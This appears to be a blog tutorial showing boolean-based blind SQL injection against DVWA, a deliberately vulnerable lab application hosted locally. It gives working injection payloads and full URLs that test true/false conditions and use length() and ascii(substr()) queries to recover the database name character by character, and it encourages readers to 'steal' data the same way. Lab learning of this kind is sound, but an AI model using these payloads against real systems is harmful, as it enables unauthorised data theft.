POC On Boolean-Based Blind SQLi
POC On Boolean-Based Blind SQLi
Introduction:-
In this POC i will see you the small demonstration of Boolean-Based SQLi vulnerability by using basic SQl queries in vulnerable web application i.e DVWA.You will get the idea How boolean based vulnerable website get affected,how you can get, steal and manipulate the data of the database by this vulnerability.here i will see you how to get database name, with the same method and using different query according to your need help you to get juicy data that you want.
About Boolean-Based Blind SQLi:-
If you see the name there are two words that is “Boolean” and “Blind” which helps you to easily understand the attack.By “boolean” means it is based on the boolean values i.e. true or false,true and false. And by “blind” mean that injection is blind and will not show you any type of error.The only way to extract the data,would be using brute force or you can say that by guessing the queries.That is why this attack is very time consuming.
Lab Environment:-
Vulnerable web application:-DVWA
Web server:-xampp
Demonstration:-
Step 1:-
Very first we will have to set up the environment. I download the DVWA that is vulnerable web application and a server(xampp) where i host DVWA.After installing xampp we have the xampp folder inside the C drive, inside Xampp we have htdocs folder then we have to paste all the files of DVWA inside htdocs.
Step 2:-
Open xampp start the apache and MySql.
Step 3:-
Then for opening the DVWA we have to go to the browser and type “127.0.0.1/DVWA-master” then we have the login screen after entering the username(admin) and password(password) you have the homepage then set security to low after completing the setup then we go for perform the attack.
Step 4:-
we find out the get method in the url for this we have to enter some data into the text field or search box in the website.
After entering 1 we have id=1 in the url of the website and have result “User ID exists in the database” its means website uses get method for connecting to the database.
Step 5:-
Now we will check that website(DVWA) is vulnerable or not for this we have these condition in this attack which is given below
- AND 1=1
- AND 1=0, AND 0=1
- OR 1=1
- OR 1=0, OR 0=1
Note :- we can use having and div in place of AND and OR
you can hit anything one of them on that website for checking vulnerability here i hit AND 1=1(it will check the condition whether 1 is equal to 1 as we know 1 is equal to 1 hence the database will answer as true)
Note:- Here i write ‘ before the queries and --+ after the queries, -- is a comment ,the server reads only the between ‘ and the commentary(--) and everything that goes after the -- the server will not read it
After that i have an no error and accept my query means it is a blind based and give result “User ID exists in the database” and using true and false condition we are going to retrieve database information (different queries can give different type of error or no error) it means website accept my queries and vulnerable from this attack(but every website have there own indication of error you have to identify that error).
Steps 6:-
Now we will go for the retrieving the name of the database for this. first we should know how many alphabets are there in the name of the database it helps in to get the name easily otherwise you will have to guess the name of the database one by one.so we use AND (length(database()))=1 --+
http://127.0.0.1/DVWA-master/vulnerabilities/sqli_blind/?id=1%27AND%20(length(database()))=1--+&Submit=Submit#
We start from 1 till then we get the length of the database.and the question is when we know my query is correct? ANSWER is at query when we get same result(“User ID exists in the database”) or don’t have any type of error means guessing is right
at 4 we get the length
http://127.0.0.1/DVWA-master/vulnerabilities/sqli_blind/?id=1%27AND%20(length(database()))=4--+&Submit=Submit#
Now we have the length i.e. there are 4 alphabets in the name of the database.
Steps 7:-
In this attack all the data is retrieve based on the ascii value.so list is given below for easily comparing the string with their binary.
Now we will find the first string for this we will use
AND (ascii(substr((select database()),1,1)))>101--+
This query will ask to the database that first string will be greater than 101 or not.
http://127.0.0.1/DVWA-master/vulnerabilities/sqli_blind/?id=1'AND(ascii(substr((select database()),1,1))) > 101 --+&Submit=Submit#
But this query gave me error means first string is not greater than 101
After guessing all the combination <,>,= I have the result that (ascii(substr((select database()),1,1)))=100--+ is the correct so match with the ASCII list and i get the value of 100 is d(lowercase)
i.e.
http://127.0.0.1/DVWA-master/vulnerabilities/sqli_blind/?id=1'AND(ascii(substr((select database()),1,1))) =100 --+&Submit=Submit#
Now we have first alphabet of the Database’s name
Steps 8:-
After using hit and trial method i get he following result which is given below:-
First string is d{AND (ascii(substr((select database()),1,1)))=100--+}
second string is v{AND (ascii(substr((select database()),2,1)))=118--+}
third string is w{AND (ascii(substr((select database()),3,1)))=119--+}
Fourth string is a{AND (ascii(substr((select database()),4,1)))=97--+}
So the name of the database is dvwa.
by following above method you can extract data according to your need..
Comments
Post a Comment